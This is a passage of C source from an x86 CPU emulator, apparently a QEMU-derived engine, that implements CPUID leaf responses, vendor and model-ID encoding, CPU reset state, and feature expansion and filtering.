compatibility mode and * when doing cross vendor migration */ if (accel_uses_host_cpuid()) { uint32_t ebx = 0, ecx = 0, edx = 0; host_cpuid(0, 0, NULL, &ebx, &ecx, &edx); } x86_cpuid_set_vendor(cpu, def->vendor); } void cpu_clear_apic_feature(CPUX86State *env) { env->features[FEAT_1_EDX] &= ~CPUID_APIC; } static void x86_cpuid_version_set_family(X86CPU *cpu, int64_t value) { CPUX86State *env = &cpu->env; const int64_t min = 0; const int64_t max = 0xff + 0xf; if (value < min || value > max) { // error_setg(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", // name ? name : "null", value, min, max); return; } env->cpuid_version &= ~0xff00f00; if (value > 0x0f) { env->cpuid_version |= 0xf00 | ((value - 0x0f) << 20); } else { env->cpuid_version |= value << 8; } } static void x86_cpuid_version_set_model(X86CPU *cpu, int64_t value) { CPUX86State *env = &cpu->env; const int64_t min = 0; const int64_t max = 0xff; if (value < min || value > max) { // error_setg(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", // name ? name : "null", value, min, max); return; } env->cpuid_version &= ~0xf00f0; env->cpuid_version |= ((value & 0xf) << 4) | ((value >> 4) << 16); } static void x86_cpuid_version_set_stepping(X86CPU *cpu, int64_t value) { CPUX86State *env = &cpu->env; const int64_t min = 0; const int64_t max = 0xf; if (value < min || value > max) { // error_setg(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", // name ?
name : "null", value, min, max); return; } env->cpuid_version &= ~0xf; env->cpuid_version |= value & 0xf; } static void x86_cpuid_set_model_id(X86CPU *cpu, const char* model_id) { CPUX86State *env = &cpu->env; int c, len, i; if (model_id == NULL) { model_id = ""; } len = strlen(model_id); memset(env->cpuid_model, 0, 48); for (i = 0; i < 48; i++) { if (i >= len) { c = '\0'; } else { c = (uint8_t)model_id[i]; } env->cpuid_model[i >> 2] |= c << (8 * (i & 3)); } } static void x86_cpuid_set_vendor(X86CPU *cpu , const char *value) { CPUX86State *env = &cpu->env; int i; if (strlen(value) != CPUID_VENDOR_SZ) { // error_setg(errp, QERR_PROPERTY_VALUE_BAD, "", "vendor", value); return; } env->cpuid_vendor1 = 0; env->cpuid_vendor2 = 0; env->cpuid_vendor3 = 0; for (i = 0; i < 4; i++) { env->cpuid_vendor1 |= ((uint8_t)value[i ]) << (8 * i); env->cpuid_vendor2 |= ((uint8_t)value[i + 4]) << (8 * i); env->cpuid_vendor3 |= ((uint8_t)value[i + 8]) << (8 * i); } } void cpu_x86_cpuid(CPUX86State *env, uint32_t index, uint32_t count, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) { X86CPU *cpu = env_archcpu(env); CPUState *cs = env_cpu(env); uint32_t die_offset; uint32_t limit; uint32_t signature[3]; X86CPUTopoInfo topo_info; topo_info.nodes_per_pkg = env->nr_nodes; topo_info.dies_per_pkg = env->nr_dies; topo_info.cores_per_die = cs->nr_cores; topo_info.threads_per_core = cs->nr_threads; /* Calculate & apply limits for different index ranges */ if (index >= 0xC0000000) { limit = env->cpuid_xlevel2; } else if (index >= 0x80000000) { limit = env->cpuid_xlevel; } else if (index >= 0x40000000) { limit = 0x40000001; } else { limit = env->cpuid_level; } if (index > limit) { /* Intel documentation states that invalid EAX input will * return the same information as EAX=cpuid_level * (Intel SDM Vol. 2A - Instruction Set Reference - CPUID) */ index = env->cpuid_level; } switch(index) { case 0: *eax = env->cpuid_level; *ebx = env->cpuid_vendor1; *edx = env->cpuid_vendor2; *ecx = env->cpuid_vendor3; break; case 1: *eax = env->cpuid_version; *ebx = (cpu->apic_id << 24) | 8 << 8; /* CLFLUSH size in quad words, Linux wants it. */ *ecx = env->features[FEAT_1_ECX]; if ((*ecx & CPUID_EXT_XSAVE) && (env->cr[4] & CR4_OSXSAVE_MASK)) { *ecx |= CPUID_EXT_OSXSAVE; } *edx = env->features[FEAT_1_EDX]; if (cs->nr_cores * cs->nr_threads > 1) { *ebx |= (cs->nr_cores * cs->nr_threads) << 16; *edx |= CPUID_HT; } break; case 2: /* cache info: needed for Pentium Pro compatibility */ if (cpu->cache_info_passthrough) { host_cpuid(index, 0, eax, ebx, ecx, edx); break; } *eax = 1; /* Number of CPUID[EAX=2] calls required */ *ebx = 0; if (!cpu->enable_l3_cache) { *ecx = 0; } else { *ecx = cpuid2_cache_descriptor(env->cache_info_cpuid2.l3_cache); } *edx = (cpuid2_cache_descriptor(env->cache_info_cpuid2.l1d_cache) << 16) | (cpuid2_cache_descriptor(env->cache_info_cpuid2.l1i_cache) << 8) | (cpuid2_cache_descriptor(env->cache_info_cpuid2.l2_cache)); break; case 4: /* cache info: needed for Core compatibility */ if (cpu->cache_info_passthrough) { host_cpuid(index, count, eax, ebx, ecx, edx); /* QEMU gives out its own APIC IDs, never pass down bits 31..26. 
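* (CPUID.04H:EAX[31:26] encodes "maximum addressable core IDs minus 1"; it is recomputed from nr_cores just below.)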
*/ *eax &= ~0xFC000000; if ((*eax & 31) && cs->nr_cores > 1) { *eax |= (cs->nr_cores - 1) << 26; } } else { *eax = 0; switch (count) { case 0: /* L1 dcache info */ encode_cache_cpuid4(env->cache_info_cpuid4.l1d_cache, 1, cs->nr_cores, eax, ebx, ecx, edx); break; case 1: /* L1 icache info */ encode_cache_cpuid4(env->cache_info_cpuid4.l1i_cache, 1, cs->nr_cores, eax, ebx, ecx, edx); break; case 2: /* L2 cache info */ encode_cache_cpuid4(env->cache_info_cpuid4.l2_cache, cs->nr_threads, cs->nr_cores, eax, ebx, ecx, edx); break; case 3: /* L3 cache info */ die_offset = apicid_die_offset(&topo_info); if (cpu->enable_l3_cache) { encode_cache_cpuid4(env->cache_info_cpuid4.l3_cache, (1 << die_offset), cs->nr_cores, eax, ebx, ecx, edx); break; } /* fall through */ default: /* end of info */ *eax = *ebx = *ecx = *edx = 0; break; } } break; case 5: /* MONITOR/MWAIT Leaf */ *eax = cpu->mwait.eax; /* Smallest monitor-line size in bytes */ *ebx = cpu->mwait.ebx; /* Largest monitor-line size in bytes */ *ecx = cpu->mwait.ecx; /* flags */ *edx = cpu->mwait.edx; /* mwait substates */ break; case 6: /* Thermal and Power Leaf */ *eax = env->features[FEAT_6_EAX]; *ebx = 0; *ecx = 0; *edx = 0; break; case 7: /* Structured Extended Feature Flags Enumeration Leaf */ if (count == 0) { /* Maximum ECX value for sub-leaves */ *eax = env->cpuid_level_func7; *ebx = env->features[FEAT_7_0_EBX]; /* Feature flags */ *ecx = env->features[FEAT_7_0_ECX]; /* Feature flags */ if ((*ecx & CPUID_7_0_ECX_PKU) && env->cr[4] & CR4_PKE_MASK) { *ecx |= CPUID_7_0_ECX_OSPKE; } *edx = env->features[FEAT_7_0_EDX]; /* Feature flags */ } else if (count == 1) { *eax = env->features[FEAT_7_1_EAX]; *ebx = 0; *ecx = 0; *edx = 0; } else { *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; } break; case 9: /* Direct Cache Access Information Leaf */ *eax = 0; /* Bits 0-31 in DCA_CAP MSR */ *ebx = 0; *ecx = 0; *edx = 0; break; case 0xA: /* Architectural Performance Monitoring Leaf */ *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; break; case 0xB: /* Extended Topology Enumeration Leaf */ if (!cpu->enable_cpuid_0xb) { *eax = *ebx = *ecx = *edx = 0; break; } *ecx = count & 0xff; *edx = cpu->apic_id; switch (count) { case 0: *eax = apicid_core_offset(&topo_info); *ebx = cs->nr_threads; *ecx |= CPUID_TOPOLOGY_LEVEL_SMT; break; case 1: *eax = env->pkg_offset; *ebx = cs->nr_cores * cs->nr_threads; *ecx |= CPUID_TOPOLOGY_LEVEL_CORE; break; default: *eax = 0; *ebx = 0; *ecx |= CPUID_TOPOLOGY_LEVEL_INVALID; } assert(!(*eax & ~0x1f)); *ebx &= 0xffff; /* The count doesn't need to be reliable. */ break; case 0x1F: /* V2 Extended Topology Enumeration Leaf */ if (env->nr_dies < 2) { *eax = *ebx = *ecx = *edx = 0; break; } *ecx = count & 0xff; *edx = cpu->apic_id; switch (count) { case 0: *eax = apicid_core_offset(&topo_info); *ebx = cs->nr_threads; *ecx |= CPUID_TOPOLOGY_LEVEL_SMT; break; case 1: *eax = apicid_die_offset(&topo_info); *ebx = cs->nr_cores * cs->nr_threads; *ecx |= CPUID_TOPOLOGY_LEVEL_CORE; break; case 2: *eax = env->pkg_offset; *ebx = env->nr_dies * cs->nr_cores * cs->nr_threads; *ecx |= CPUID_TOPOLOGY_LEVEL_DIE; break; default: *eax = 0; *ebx = 0; *ecx |= CPUID_TOPOLOGY_LEVEL_INVALID; } assert(!(*eax & ~0x1f)); *ebx &= 0xffff; /* The count doesn't need to be reliable. 
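* (The SDM directs software to enumerate topology from the EAX shift widths of leaf 0BH, not from the logical-processor counts in EBX.)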
*/ break; case 0xD: { /* Processor Extended State */ *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; if (!(env->features[FEAT_1_ECX] & CPUID_EXT_XSAVE)) { break; } if (count == 0) { *ecx = xsave_area_size(x86_cpu_xsave_components(cpu)); *eax = env->features[FEAT_XSAVE_COMP_LO]; *edx = env->features[FEAT_XSAVE_COMP_HI]; /* * The initial values of xcr0 and ebx are 0. On hosts without KVM * commit 412a3c41 (e.g., CentOS 6), ebx stays 0 even after the * guest updates xcr0, which crashes some legacy guests, so set * ebx == ecx to work around it. */ *ebx = xsave_area_size(env->xcr0); } else if (count == 1) { *eax = env->features[FEAT_XSAVE]; } else if (count < ARRAY_SIZE(x86_ext_save_areas)) { if ((x86_cpu_xsave_components(cpu) >> count) & 1) { const ExtSaveArea *esa = &x86_ext_save_areas[count]; *eax = esa->size; *ebx = esa->offset; } } break; } case 0x14: { /* Intel Processor Trace Enumeration */ *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; if (!(env->features[FEAT_7_0_EBX] & CPUID_7_0_EBX_INTEL_PT)) { break; } if (count == 0) { *eax = INTEL_PT_MAX_SUBLEAF; *ebx = INTEL_PT_MINIMAL_EBX; *ecx = INTEL_PT_MINIMAL_ECX; } else if (count == 1) { *eax = INTEL_PT_MTC_BITMAP | INTEL_PT_ADDR_RANGES_NUM; *ebx = INTEL_PT_PSB_BITMAP | INTEL_PT_CYCLE_BITMAP; } break; } case 0x40000000: /* * CPUID code in kvm_arch_init_vcpu() ignores stuff * set here, but we restrict to TCG nonetheless. */ if (cpu->expose_tcg) { memcpy(signature, "TCGTCGTCGTCG", 12); *eax = 0x40000001; *ebx = signature[0]; *ecx = signature[1]; *edx = signature[2]; } else { *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; } break; case 0x40000001: *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; break; case 0x80000000: *eax = env->cpuid_xlevel; *ebx = env->cpuid_vendor1; *edx = env->cpuid_vendor2; *ecx = env->cpuid_vendor3; break; case 0x80000001: *eax = env->cpuid_version; *ebx = 0; *ecx = env->features[FEAT_8000_0001_ECX]; *edx = env->features[FEAT_8000_0001_EDX]; /* The Linux kernel checks for the CMPLegacy bit and * discards multiple thread information if it is set. * So don't set it here for Intel to make Linux guests happy.
*/ if (cs->nr_cores * cs->nr_threads > 1) { if (env->cpuid_vendor1 != CPUID_VENDOR_INTEL_1 || env->cpuid_vendor2 != CPUID_VENDOR_INTEL_2 || env->cpuid_vendor3 != CPUID_VENDOR_INTEL_3) { *ecx |= 1 << 1; /* CmpLegacy bit */ } } break; case 0x80000002: case 0x80000003: case 0x80000004: *eax = env->cpuid_model[(index - 0x80000002) * 4 + 0]; *ebx = env->cpuid_model[(index - 0x80000002) * 4 + 1]; *ecx = env->cpuid_model[(index - 0x80000002) * 4 + 2]; *edx = env->cpuid_model[(index - 0x80000002) * 4 + 3]; break; case 0x80000005: /* cache info (L1 cache) */ if (cpu->cache_info_passthrough) { host_cpuid(index, 0, eax, ebx, ecx, edx); break; } *eax = (L1_DTLB_2M_ASSOC << 24) | (L1_DTLB_2M_ENTRIES << 16) | \ (L1_ITLB_2M_ASSOC << 8) | (L1_ITLB_2M_ENTRIES); *ebx = (L1_DTLB_4K_ASSOC << 24) | (L1_DTLB_4K_ENTRIES << 16) | \ (L1_ITLB_4K_ASSOC << 8) | (L1_ITLB_4K_ENTRIES); *ecx = encode_cache_cpuid80000005(env->cache_info_amd.l1d_cache); *edx = encode_cache_cpuid80000005(env->cache_info_amd.l1i_cache); break; case 0x80000006: /* cache info (L2 cache) */ if (cpu->cache_info_passthrough) { host_cpuid(index, 0, eax, ebx, ecx, edx); break; } *eax = (AMD_ENC_ASSOC(L2_DTLB_2M_ASSOC) << 28) | \ (L2_DTLB_2M_ENTRIES << 16) | \ (AMD_ENC_ASSOC(L2_ITLB_2M_ASSOC) << 12) | \ (L2_ITLB_2M_ENTRIES); *ebx = (AMD_ENC_ASSOC(L2_DTLB_4K_ASSOC) << 28) | \ (L2_DTLB_4K_ENTRIES << 16) | \ (AMD_ENC_ASSOC(L2_ITLB_4K_ASSOC) << 12) | \ (L2_ITLB_4K_ENTRIES); encode_cache_cpuid80000006(env->cache_info_amd.l2_cache, cpu->enable_l3_cache ? env->cache_info_amd.l3_cache : NULL, ecx, edx); break; case 0x80000007: *eax = 0; *ebx = 0; *ecx = 0; *edx = env->features[FEAT_8000_0007_EDX]; break; case 0x80000008: /* virtual & phys address size in low 2 bytes. */ if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_LM) { /* 64 bit processor */ *eax = cpu->phys_bits; /* configurable physical bits */ if (env->features[FEAT_7_0_ECX] & CPUID_7_0_ECX_LA57) { *eax |= 0x00003900; /* 57 bits virtual */ } else { *eax |= 0x00003000; /* 48 bits virtual */ } } else { *eax = cpu->phys_bits; } *ebx = env->features[FEAT_8000_0008_EBX]; *ecx = 0; *edx = 0; if (cs->nr_cores * cs->nr_threads > 1) { *ecx |= (cs->nr_cores * cs->nr_threads) - 1; } break; case 0x8000000A: if (env->features[FEAT_8000_0001_ECX] & CPUID_EXT3_SVM) { *eax = 0x00000001; /* SVM Revision */ *ebx = 0x00000010; /* nr of ASIDs */ *ecx = 0; *edx = env->features[FEAT_SVM]; /* optional features */ } else { *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; } break; case 0x8000001D: *eax = 0; if (cpu->cache_info_passthrough) { host_cpuid(index, count, eax, ebx, ecx, edx); break; } switch (count) { case 0: /* L1 dcache info */ encode_cache_cpuid8000001d(env->cache_info_amd.l1d_cache, &topo_info, eax, ebx, ecx, edx); break; case 1: /* L1 icache info */ encode_cache_cpuid8000001d(env->cache_info_amd.l1i_cache, &topo_info, eax, ebx, ecx, edx); break; case 2: /* L2 cache info */ encode_cache_cpuid8000001d(env->cache_info_amd.l2_cache, &topo_info, eax, ebx, ecx, edx); break; case 3: /* L3 cache info */ encode_cache_cpuid8000001d(env->cache_info_amd.l3_cache, &topo_info, eax, ebx, ecx, edx); break; default: /* end of info */ *eax = *ebx = *ecx = *edx = 0; break; } break; case 0x8000001E: assert(cpu->core_id <= 255); encode_topo_cpuid8000001e(&topo_info, cpu, eax, ebx, ecx, edx); break; case 0xC0000000: *eax = env->cpuid_xlevel2; *ebx = 0; *ecx = 0; *edx = 0; break; case 0xC0000001: /* Support for VIA CPU's CPUID instruction */ *eax = env->cpuid_version; *ebx = 0; *ecx = 0; *edx = env->features[FEAT_C000_0001_EDX]; break; 
case 0xC0000002: case 0xC0000003: case 0xC0000004: /* Reserved for the future, and now filled with zero */ *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; break; default: /* reserved values: zero */ *eax = 0; *ebx = 0; *ecx = 0; *edx = 0; break; } } static void x86_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); X86CPU *cpu = X86_CPU(s); X86CPUClass *xcc = X86_CPU_GET_CLASS(cpu); CPUX86State *env = &cpu->env; target_ulong cr4; uint64_t xcr0; int i; xcc->parent_reset(s); memset(env, 0, offsetof(CPUX86State, end_reset_fields)); env->old_exception = -1; /* init to reset state */ env->hflags2 |= HF2_GIF_MASK; cpu_x86_update_cr0(env, 0x60000010); env->a20_mask = ~0x0; env->smbase = 0x30000; env->msr_smi_count = 0; env->idt.limit = 0xffff; env->gdt.limit = 0xffff; env->ldt.limit = 0xffff; env->ldt.flags = DESC_P_MASK | (2 << DESC_TYPE_SHIFT); env->tr.limit = 0xffff; env->tr.flags = DESC_P_MASK | (11 << DESC_TYPE_SHIFT); cpu_x86_load_seg_cache(env, R_CS, 0xf000, 0xffff0000, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_SS, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK); cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK); env->eip = 0xfff0; env->regs[R_EDX] = env->cpuid_version; env->eflags = 0x2; /* FPU init */ for (i = 0; i < 8; i++) { env->fptags[i] = 1; } cpu_set_fpuc(env, 0x37f); env->mxcsr = 0x1f80; /* All units are in INIT state. */ env->xstate_bv = 0; env->pat = 0x0007040600070406ULL; env->msr_ia32_misc_enable = MSR_IA32_MISC_ENABLE_DEFAULT; if (env->features[FEAT_1_ECX] & CPUID_EXT_MONITOR) { env->msr_ia32_misc_enable |= MSR_IA32_MISC_ENABLE_MWAIT; } memset(env->dr, 0, sizeof(env->dr)); env->dr[6] = DR6_FIXED_1; env->dr[7] = DR7_FIXED_1; cpu_breakpoint_remove_all(s, BP_CPU); cpu_watchpoint_remove_all(s, BP_CPU); cr4 = 0; xcr0 = XSTATE_FP_MASK; /* Enable all the features for user-mode. */ if (env->features[FEAT_1_EDX] & CPUID_SSE) { xcr0 |= XSTATE_SSE_MASK; } for (i = 2; i < ARRAY_SIZE(x86_ext_save_areas); i++) { const ExtSaveArea *esa = &x86_ext_save_areas[i]; if (env->features[esa->feature] & esa->bits) { xcr0 |= 1ull << i; } } if (env->features[FEAT_1_ECX] & CPUID_EXT_XSAVE) { cr4 |= CR4_OSFXSR_MASK | CR4_OSXSAVE_MASK; } if (env->features[FEAT_7_0_EBX] & CPUID_7_0_EBX_FSGSBASE) { cr4 |= CR4_FSGSBASE_MASK; } env->xcr0 = xcr0; cpu_x86_update_cr4(env, cr4); /* * SDM 11.11.5 requires: * - IA32_MTRR_DEF_TYPE MSR.E = 0 * - IA32_MTRR_PHYSMASKn.V = 0 * All other bits are undefined. For simplification, zero it all. */ env->mtrr_deftype = 0; memset(env->mtrr_var, 0, sizeof(env->mtrr_var)); memset(env->mtrr_fixed, 0, sizeof(env->mtrr_fixed)); } static void mce_init(X86CPU *cpu) { CPUX86State *cenv = &cpu->env; unsigned int bank; if (((cenv->cpuid_version >> 8) & 0xf) >= 6 && (cenv->features[FEAT_1_EDX] & (CPUID_MCE | CPUID_MCA)) == (CPUID_MCE | CPUID_MCA)) { cenv->mcg_cap = MCE_CAP_DEF | MCE_BANKS_DEF | (cpu->enable_lmce ? 
MCG_LMCE_P : 0); cenv->mcg_ctl = ~(uint64_t)0; for (bank = 0; bank < MCE_BANKS_DEF; bank++) { cenv->mce_banks[bank * 4] = ~(uint64_t)0; } } } static void x86_cpu_adjust_level(X86CPU *cpu, uint32_t *min, uint32_t value) { if (*min < value) { *min = value; } } /* Increase cpuid_min_{level,xlevel,xlevel2} automatically, if appropriate */ static void x86_cpu_adjust_feat_level(X86CPU *cpu, FeatureWord w) { CPUX86State *env = &cpu->env; FeatureWordInfo *fi = &feature_word_info[w]; uint32_t eax = fi->cpuid.eax; uint32_t region = eax & 0xF0000000; assert(feature_word_info[w].type == CPUID_FEATURE_WORD); if (!env->features[w]) { return; } switch (region) { case 0x00000000: x86_cpu_adjust_level(cpu, &env->cpuid_min_level, eax); break; case 0x80000000: x86_cpu_adjust_level(cpu, &env->cpuid_min_xlevel, eax); break; case 0xC0000000: x86_cpu_adjust_level(cpu, &env->cpuid_min_xlevel2, eax); break; } if (eax == 7) { x86_cpu_adjust_level(cpu, &env->cpuid_min_level_func7, fi->cpuid.ecx); } } /* Calculate XSAVE components based on the configured CPU feature flags */ static void x86_cpu_enable_xsave_components(X86CPU *cpu) { CPUX86State *env = &cpu->env; int i; uint64_t mask; if (!(env->features[FEAT_1_ECX] & CPUID_EXT_XSAVE)) { return; } mask = 0; for (i = 0; i < ARRAY_SIZE(x86_ext_save_areas); i++) { const ExtSaveArea *esa = &x86_ext_save_areas[i]; if (env->features[esa->feature] & esa->bits) { mask |= (1ULL << i); } } env->features[FEAT_XSAVE_COMP_LO] = mask; env->features[FEAT_XSAVE_COMP_HI] = mask >> 32; } /***** Steps involved in loading and filtering CPUID data * * When initializing and realizing a CPU object, the steps * involved in setting up CPUID data are: * * 1) Loading CPU model definition (X86CPUDefinition). This is * implemented by x86_cpu_load_model() and should be completely * transparent, as it is done automatically by instance_init. * No code should need to look at X86CPUDefinition structs * outside instance_init. * * 2) CPU expansion. This is done by realize before CPUID * filtering, and will make sure host/accelerator data is * loaded for CPU models that depend on host capabilities * (e.g. "host"). Done by x86_cpu_expand_features(). * * 3) CPUID filtering. This initializes extra data related to * CPUID, and checks if the host supports all capabilities * required by the CPU. Runnability of a CPU model is * determined at this step. Done by x86_cpu_filter_features(). * * Some operations don't require all steps to be performed. * More precisely: * * - CPU instance creation (instance_init) will run only CPU * model loading. CPU expansion can't run at instance_init-time * because host/accelerator data may not be available yet. * - CPU realization will perform both CPU model expansion and CPUID * filtering, and return an error in case one of them fails. * - query-cpu-definitions needs to run all 3 steps. It needs * to run CPUID filtering, as the 'unavailable-features' * field is set based on the filtering results. * - The query-cpu-model-expansion QMP command only needs to run * CPU model loading and CPU expansion. It should not filter * any CPUID data based on host capabilities. */ /* Expand CPU configuration data, based on configured features * and host/accelerator capabilities when appropriate. */ static void x86_cpu_expand_features(X86CPU *cpu) { CPUX86State *env = &cpu->env; FeatureWord w; /*TODO: Now cpu->max_features doesn't overwrite features * set using QOM properties, and we can convert * plus_features & minus_features to global properties * inside x86_cpu_parse_featurestr() too.
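* (As the expression below shows, max_features starts from everything the accelerator supports, then the user_features and no_autoenable_flags masks carve bits back out.)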
*/ if (cpu->max_features) { for (w = 0; w < FEATURE_WORDS; w++) { /* Override only features that weren't set explicitly * by the user. */ env->features[w] |= x86_cpu_get_supported_feature_word(w, cpu->migratable) & ~env->user_features[w] & \ ~feature_word_info[w].no_autoenable_flags; } } env->features[FEAT_KVM] = 0; x86_cpu_enable_xsave_components(cpu); /* CPUID[EAX=7,ECX=0].EBX always increases the level automatically: */ x86_cpu_adjust_feat_level(cpu, FEAT_7_0_EBX); if (cpu->full_cpuid_auto_level) { x86_cpu_adjust_feat_level(cpu, FEAT_1_EDX); x86_cpu_adjust_feat_level(cpu, FEAT_1_ECX); x86_cpu_adjust_feat_level(cpu, FEAT_6_EAX); x86_cpu_adjust_feat_level(cpu, FEAT_7_0_ECX); x86_cpu_adjust_feat_level(cpu, FEAT_7_1_EAX); x86_cpu_adjust_feat_level(cpu, FEAT_8000_0001_EDX); x86_cpu_adjust_feat_level(cpu, FEAT_8000_0001_ECX); x86_cpu_adjust_feat_level(cpu, FEAT_8000_0007_EDX); x86_cpu_adjust_feat_level(cpu, FEAT_8000_0008_EBX); x86_cpu_adjust_feat_level(cpu, FEAT_C000_0001_EDX); x86_cpu_adjust_feat_level(cpu, FEAT_SVM); x86_cpu_adjust_feat_level(cpu, FEAT_XSAVE); /* Intel Processor Trace requires CPUID[0x14] */ if ((env->features[FEAT_7_0_EBX] & CPUID_7_0_EBX_INTEL_PT)) { if (cpu->intel_pt_auto_level) { x86_cpu_adjust_level(cpu, &cpu->env.cpuid_min_level, 0x14); } else if (cpu->env.cpuid_min_level < 0x14) { // TODO: Add a warning? // mark_unavailable_features(cpu, FEAT_7_0_EBX, // CPUID_7_0_EBX_INTEL_PT, // "Intel PT needs CPUID leaf 0x14, please set by \"-cpu ...,+intel-pt,level=0x14\""); } } /* CPU topology with multi-die support requires CPUID[0x1F] */ if (env->nr_dies > 1) { x86_cpu_adjust_level(cpu, &env->cpuid_min_level, 0x1F); } /* SVM requires CPUID[0x8000000A] */ if (env->features[FEAT_8000_0001_ECX] & CPUID_EXT3_SVM) { x86_cpu_adjust_level(cpu, &env->cpuid_min_xlevel, 0x8000000A); } /* SEV requires CPUID[0x8000001F] */ // if (sev_enabled()) { // x86_cpu_adjust_level(cpu, &env->cpuid_min_xlevel, 0x8000001F); // } } /* Set cpuid_*level* based on cpuid_min_*level, if not explicitly set */ if (env->cpuid_level_func7 == UINT32_MAX) { env->cpuid_level_func7 = env->cpuid_min_level_func7; } if (env->cpuid_level == UINT32_MAX) { env->cpuid_level = env->cpuid_min_level; } if (env->cpuid_xlevel == UINT32_MAX) { env->cpuid_xlevel = env->cpuid_min_xlevel; } if (env->cpuid_xlevel2 == UINT32_MAX) { env->cpuid_xlevel2 = env->cpuid_min_xlevel2; } } /* * Finishes initialization of CPUID data and filters CPU feature * words based on host availability of each feature. Unsupported * bits are recorded in cpu->filtered_features rather than returned. */ static void x86_cpu_filter_features(X86CPU *cpu, bool verbose) { CPUX86State *env = &cpu->env; FeatureWord w; const char *prefix = NULL; for (w = 0; w < FEATURE_WORDS; w++) { uint64_t host_feat = x86_cpu_get_supported_feature_word(w, false); uint64_t requested_features = env->features[w]; uint64_t unavailable_features = requested_features & ~host_feat; mark_unavailable_features(cpu, w, unavailable_features, prefix); } } static void x86_cpu_realizefn(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); X86CPU *cpu = X86_CPU(cs); X86CPUClass *xcc = X86_CPU_GET_CLASS(cs); CPUX86State *env = &cpu->env; if (cpu->ucode_rev == 0) { /* The default is the same as KVM's.
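* (The microcode-revision MSR reports the revision in its upper 32 bits, so 0x100000000ULL reads back as revision 1 on Intel.)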
*/ if (IS_AMD_CPU(env)) { cpu->ucode_rev = 0x01000065; } else { cpu->ucode_rev = 0x100000000ULL; } } /* mwait extended info: needed for Core compatibility */ /* We always wake on interrupt even if the host does not have the capability */ cpu->mwait.ecx |= CPUID_MWAIT_EMX | CPUID_MWAIT_IBE; if (cpu->apic_id == UNASSIGNED_APIC_ID) { //error_setg(errp, "apic-id property was not initialized properly"); return; } x86_cpu_expand_features(cpu); x86_cpu_filter_features(cpu, cpu->check_cpuid || cpu->enforce_cpuid); if (cpu->enforce_cpuid && x86_cpu_have_filtered_features(cpu)) { // error_setg(&local_err, // accel_uses_host_cpuid() ? // "Host doesn't support requested features" : // "TCG doesn't support requested features"); return; } /* On AMD CPUs, some CPUID[8000_0001].EDX bits must match the bits on * CPUID[1].EDX. */ if (IS_AMD_CPU(env)) { env->features[FEAT_8000_0001_EDX] &= ~CPUID_EXT2_AMD_ALIASES; env->features[FEAT_8000_0001_EDX] |= (env->features[FEAT_1_EDX] & CPUID_EXT2_AMD_ALIASES); } /* For 64-bit systems, choose the number of physical address bits to * present. Ideally this should be the same as the host; anything other * than matching the host can cause incorrect guest behaviour. * QEMU used to pick the magic value of 40 bits that corresponds to * consumer AMD devices but nothing else. */ if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_LM) { if (cpu->phys_bits && cpu->phys_bits != TCG_PHYS_ADDR_BITS) { //error_setg(errp, "TCG only supports phys-bits=%u", // TCG_PHYS_ADDR_BITS); return; } /* 0 means it was not explicitly set by the user (or by machine * compat_props or by the host code above). In this case, the default * is the value used by TCG (40). */ if (cpu->phys_bits == 0) { cpu->phys_bits = TCG_PHYS_ADDR_BITS; } } else { /* For 32-bit systems, don't use the user-set value, but keep * phys_bits consistent with what we tell the guest.
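* (Hence 36 bits below when PSE36 is advertised, 32 otherwise.)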
*/ if (cpu->phys_bits != 0) { //error_setg(errp, "phys-bits is not user-configurable in 32 bit"); return; } if (env->features[FEAT_1_EDX] & CPUID_PSE36) { cpu->phys_bits = 36; } else { cpu->phys_bits = 32; } } /* Cache information initialization */ if (!cpu->legacy_cache) { if (!xcc->model || !xcc->model->cpudef->cache_info) { // g_autofree char *name = x86_cpu_class_get_model_name(xcc); //error_setg(errp, // "CPU model '%s' doesn't support legacy-cache=off", name); return; } env->cache_info_cpuid2 = env->cache_info_cpuid4 = env->cache_info_amd = *xcc->model->cpudef->cache_info; } else { /* Build legacy cache information */ env->cache_info_cpuid2.l1d_cache = &legacy_l1d_cache; env->cache_info_cpuid2.l1i_cache = &legacy_l1i_cache; env->cache_info_cpuid2.l2_cache = &legacy_l2_cache_cpuid2; env->cache_info_cpuid2.l3_cache = &legacy_l3_cache; env->cache_info_cpuid4.l1d_cache = &legacy_l1d_cache; env->cache_info_cpuid4.l1i_cache = &legacy_l1i_cache; env->cache_info_cpuid4.l2_cache = &legacy_l2_cache; env->cache_info_cpuid4.l3_cache = &legacy_l3_cache; env->cache_info_amd.l1d_cache = &legacy_l1d_cache_amd; env->cache_info_amd.l1i_cache = &legacy_l1i_cache_amd; env->cache_info_amd.l2_cache = &legacy_l2_cache_amd; env->cache_info_amd.l3_cache = &legacy_l3_cache; } cpu_exec_realizefn(cs); mce_init(cpu); cpu_reset(cs); } static void x86_cpu_initfn(struct uc_struct *uc, CPUState *obj) { X86CPU *cpu = X86_CPU(obj); X86CPUClass *xcc = X86_CPU_GET_CLASS(obj); CPUX86State *env = &cpu->env; env->nr_dies = 1; env->nr_nodes = 1; 